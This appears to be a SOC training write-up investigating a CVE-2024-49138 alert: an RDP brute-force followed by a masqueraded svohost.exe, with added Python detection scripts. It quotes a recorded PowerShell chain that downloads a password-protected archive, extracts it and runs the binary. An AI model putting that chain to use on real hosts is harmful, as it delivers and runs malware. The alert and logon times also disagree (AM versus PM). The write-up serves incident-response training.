Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected
Severity: High
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Category: Privilege Escalation

Base Information

Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Rule: SOC335 – CVE-2024-49138 Exploitation Detected
Analyst Level: Security Analyst
Hostname: Victor
IP Address: 172.16.17.207
Process Name: svohost.exe
Process Path: C:\temp\service_installer\svohost.exe
Process ID: 7640
Parent Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line: ??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
File Hash (SHA-256): b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
Process User: EC2AMAZ-ILGVOIN\LetsDefend
Trigger Reason: Suspicious behavior patterns linked to CVE-2024-49138
Device Action: Allowed

Incident Details

Incident Name: EventID 313 – SOC335 CVE-2024-49138 Exploitation
Incident Type: Privilege Escalation
Created Date: Jan 08, 2026, 09:12 AM

Pre-Investigation Notes

  • Date: Jan 22, 2025, 02:37 AM
  • Hostname: Victor
  • IP Address: 172.16.17.207
  • Process Name: svohost.exe
  • Process ID: 7640
  • File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
  • User: EC2AMAZ-ILGVOIN\LetsDefend

Play Book

The process name is suspicious because it closely mimics svchost.exe with a single substituted character (c replaced by o), a common masquerading technique used by malware to blend in with legitimate Windows processes in a process list. The context reinforces this: the genuine svchost.exe lives in C:\Windows\System32 and is started by services.exe, whereas this binary ran from C:\temp\service_installer, a user-writable staging directory, with powershell.exe as its parent.

Check if the malware is quarantined or cleaned

The alert's Device Action is Allowed, so the binary was neither quarantined nor cleaned at execution time. The logon record below is the remote session that preceded the execution:

Type: OS
Source Address: 185.107.56.141
Source Port: 0
Destination Address: 172.16.17.207
Destination Port: 0
Time: Jan 22, 2025, 02:35 PM
Username: Victor
Event ID: 4624
Logon Type: 10 (RemoteInteractive)
Source IP: 185.107.56.141

Malware Analysis

VirusTotal analysis confirms the file is highly suspicious based on community detections and behavioral indicators.

YARA Signature Match – THOR APT Scanner
Rule: SUSP_HKTL_Gen_Pattern_Feb25_2
Rule Set: Livehunt – Hacktools Indicators
Description: Generic hacktool behavior pattern
Detection Ratio: 51 / 74 engines

Hybrid Analysis reports indicate the executable behaves like a service installer abuse tool commonly used during privilege escalation attacks.

Command and Control Activity Review

Multiple failed authentication attempts against the admin and guest accounts were observed from the same external IP address (185.107.56.141) immediately before a successful RDP logon as Victor from that address.

Failed Login Attempts (Event ID 4625)

Time                    Username  Source IP       Destination IP  Error Code  Description
Jan 22, 2025, 02:35 PM  admin     185.107.56.141  172.16.17.207   0xC000006D  Invalid credentials
Jan 22, 2025, 02:35 PM  admin     185.107.56.141  172.16.17.207   0xC000006D  Invalid credentials
Jan 22, 2025, 02:35 PM  guest     185.107.56.141  172.16.17.207   0xC000006D  Invalid credentials
Jan 22, 2025, 02:35 PM  guest     185.107.56.141  172.16.17.207   0xC000006D  Invalid credentials

Status code 0xC000006D is STATUS_LOGON_FAILURE (unknown user name or bad password). Two attempts each against admin and guest, followed within the same minute by a successful logon as a different account from the same external address, is a brute-force or password-spray pattern rather than a user mistyping a password.

Successful Login (Event ID 4624)

Time                    Username  Source IP       Destination IP  Logon Type  Description
Jan 22, 2025, 02:35 PM  Victor    185.107.56.141  172.16.17.207   10          Successful RDP login
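The correlation the analyst performs by hand above (4625 failures from one source, then a 4624 type 10 logon from the same source) written as detection logic. This is an added example, not part of the LetsDefend write-up: the event records are constructed to mirror the two tables (with seconds assigned inside the same minute, plus two internal logons as benign controls), and the field names, the ten-minute window and the three-failure threshold are assumptions chosen for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events modelled on the alert's log tables (not SIEM exports).
# The last two rows are a benign control from an internal address: one failure
# followed by a success, which must not be flagged.
AUTH_EVENTS = [
    {"time": "2025-01-22 14:35:01", "event_id": 4625, "user": "admin",  "src": "185.107.56.141", "dst": "172.16.17.207", "status": "0xC000006D"},
    {"time": "2025-01-22 14:35:04", "event_id": 4625, "user": "admin",  "src": "185.107.56.141", "dst": "172.16.17.207", "status": "0xC000006D"},
    {"time": "2025-01-22 14:35:09", "event_id": 4625, "user": "guest",  "src": "185.107.56.141", "dst": "172.16.17.207", "status": "0xC000006D"},
    {"time": "2025-01-22 14:35:12", "event_id": 4625, "user": "guest",  "src": "185.107.56.141", "dst": "172.16.17.207", "status": "0xC000006D"},
    {"time": "2025-01-22 14:35:40", "event_id": 4624, "user": "Victor", "src": "185.107.56.141", "dst": "172.16.17.207", "logon_type": 10},
    {"time": "2025-01-22 14:36:10", "event_id": 4625, "user": "Victor", "src": "172.16.17.50",   "dst": "172.16.17.207", "status": "0xC000006D"},
    {"time": "2025-01-22 14:36:30", "event_id": 4624, "user": "Victor", "src": "172.16.17.50",   "dst": "172.16.17.207", "logon_type": 10},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def find_bruteforce_then_rdp(events, window=timedelta(minutes=10), min_failures=3):
    """Return one finding per successful RDP logon (4624, logon type 10) that was
    preceded within `window` by at least `min_failures` 4625 events from the same
    source IP. Failures are counted per source, not per account, so a spray over
    several accounts that ends with a success on a different account still fires."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)

    findings = []
    for src, evs in by_src.items():
        evs.sort(key=_ts)
        for i, ev in enumerate(evs):
            if ev["event_id"] != 4624 or ev.get("logon_type") != 10:
                continue
            t_success = _ts(ev)
            failures = [f for f in evs[:i]
                        if f["event_id"] == 4625 and t_success - _ts(f) <= window]
            if len(failures) >= min_failures:
                findings.append({
                    "src": src,
                    "dst": ev["dst"],
                    "logon_user": ev["user"],
                    "failed_attempts": len(failures),
                    "targeted_users": sorted({f["user"] for f in failures}),
                    "success_time": ev["time"],
                })
    return findings


if __name__ == "__main__":
    for finding in find_bruteforce_then_rdp(AUTH_EVENTS):
        print(finding)
```

Counting per source rather than per account is the design choice that matters here: a rule keyed on the account name would see two failures for admin, two for guest and a clean success for Victor, and never fire. The finding also lists the accounts that were guessed, which is what the analyst needs when deciding whose credentials to reset.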

Containment Actions

  • User account was contained for further investigation
  • Host activity monitoring was enabled
  • Malicious process execution was blocked

Observed Execution Chain

powershell.exe (the parent process recorded in the alert) downloaded a password-protected archive, extracted it with 7-Zip, and executed the masqueraded binary from a temporary directory. The recorded PowerShell command sequence:

$url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'
$dest = 'C:\temp\service-installer.zip'
$extractPath = 'C:\temp'
$password = 'infected'
Invoke-WebRequest -Uri $url -OutFile $dest
7z.exe x -pinfected -oC:\temp service-installer.zip
C:\temp\service_installer\svohost.exe
  1. Defines the download URL: $url points to a ZIP archive hosted on Amazon S3 (service-installer.zip).

  2. Sets where the file will be saved: $dest is the local path for the downloaded archive, C:\temp\service-installer.zip.

  3. Defines the extraction directory: $extractPath is set to C:\temp, where the archive contents will be unpacked.

  4. Defines the archive password: $password = 'infected'. Password-protected archives are commonly used to evade antivirus scanning during download, because the scanner cannot inspect encrypted content; "infected" is also the conventional password used by malware-sample sharing services.

  5. Downloads the archive: Invoke-WebRequest -Uri $url -OutFile $dest pulls the ZIP from the remote server and saves it locally.

  6. Extracts the archive with 7-Zip: 7z.exe x -pinfected -oC:\temp service-installer.zip, where x extracts files with full paths, -pinfected supplies the password (7-Zip takes the value directly after the switch, with no space), and -oC:\temp sets the output directory. This unpacks the archive into C:\temp, creating C:\temp\service_installer\. Note that $extractPath and $password are assigned but never referenced; the 7z.exe call repeats both values as literals.

  7. Executes the extracted binary: C:\temp\service_installer\svohost.exe is run directly after extraction, which is the process the alert fired on.
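A triage check covering both the masquerading observation in the Play Book section and the execution chain above, written as an added example rather than code from the write-up. It flags a process name one edit away from a known Windows binary (svohost.exe against svchost.exe), a genuine system binary name running outside System32/SysWOW64, execution from a staging directory such as C:\temp, and a script-host parent such as powershell.exe. The binary list, the directory lists and the sample events are constructed assumptions; the second and third control events generalise beyond the single case on the page.

```python
import ntpath

# Windows binaries that malware frequently imitates (small subset; an assumption
# for the example, extend it from the environment's baseline).
KNOWN_SYSTEM_BINARIES = {
    "svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe",
    "explorer.exe", "conhost.exe", "spoolsv.exe", "wininit.exe",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# User-writable directories commonly used to stage payloads (assumption; tune per environment).
STAGING_DIRS = ("c:\\temp\\", "c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed process-creation events (not endpoint telemetry). The first mirrors the
# alert; the others are controls: a legitimate svchost.exe, an exact system name
# dropped into a public folder, and an archiver run from C:\temp by the shell.
PROC_EVENTS = [
    {"image": r"C:\temp\service_installer\svohost.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Users\Public\svchost.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\temp\7z.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def edit_distance(a, b):
    """Levenshtein distance using the standard row-by-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(name):
    """Return the system binary that `name` imitates (exactly one edit away), else None.
    An exact match is not a lookalike; that case is handled by the path check."""
    name = name.lower()
    if name in KNOWN_SYSTEM_BINARIES:
        return None
    for legit in sorted(KNOWN_SYSTEM_BINARIES):
        if edit_distance(name, legit) == 1:
            return legit
    return None


def assess(event):
    """Return the list of masquerading / execution-chain indicators for one event."""
    path = event["image"].lower()
    name = ntpath.basename(path)
    parent = ntpath.basename(event["parent_image"].lower())
    reasons = []
    imitated = lookalike(name)
    if imitated:
        reasons.append(f"name {name} is one character away from {imitated}")
    if name in KNOWN_SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS):
        reasons.append(f"system binary name {name} running outside System32/SysWOW64")
    if path.startswith(STAGING_DIRS):
        reasons.append("executed from a user-writable staging directory")
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    return reasons


def triage(events, min_reasons=2):
    """Return (image, reasons) for every event with at least `min_reasons` indicators."""
    flagged = []
    for ev in events:
        reasons = assess(ev)
        if len(reasons) >= min_reasons:
            flagged.append((ev["image"], reasons))
    return flagged


if __name__ == "__main__":
    for image, reasons in triage(PROC_EVENTS):
        print(image)
        for r in reasons:
            print("  -", r)
```

Requiring two independent indicators before flagging keeps the archiver run from C:\temp out of the queue while still catching the svohost.exe case on three counts (lookalike name, staging directory, script-host parent) and the exact-name-wrong-directory variant on two. The edit-distance check is deliberately limited to distance 1 so that unrelated short names do not collide with the system list.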

Impact Assessment

  • Privilege escalation: Confirmed
  • Host compromise: Partial
  • Persistence risk: High
  • Lateral movement: Not observed
  • Data exposure: Unknown

Recommended Actions

  1. Immediately isolate the affected endpoint and review why RDP on it was reachable from an external address
  2. Reset credentials associated with the compromised user, including the Victor account used for the RDP logon and the targeted admin and guest accounts
  3. Remove all artifacts related to the malicious installer (C:\temp\service-installer.zip and C:\temp\service_installer\)
  4. Patch systems vulnerable to CVE-2024-49138 (the Windows Common Log File System driver elevation of privilege flaw fixed in the December 2024 security updates)
  5. Enable enhanced logging and EDR protections
  6. Monitor for similar masquerading techniques across the environment

Final Verdict

True Positive – Confirmed Privilege Escalation Exploitation

The alert represents successful execution of a disguised hacktool binary associated with CVE-2024-49138 exploitation activity, following a successful external RDP logon that was preceded by repeated failed authentication attempts. Immediate remediation and system hardening are required.

Analyst Note

The investigation confirmed the execution of a malicious binary impersonating a legitimate Windows service process. The activity originated from an external IP address, involved multiple failed authentication attempts, and resulted in a successful RDP login followed by malicious process execution. Evidence supports a confirmed privilege escalation scenario with a high risk of persistence if not remediated.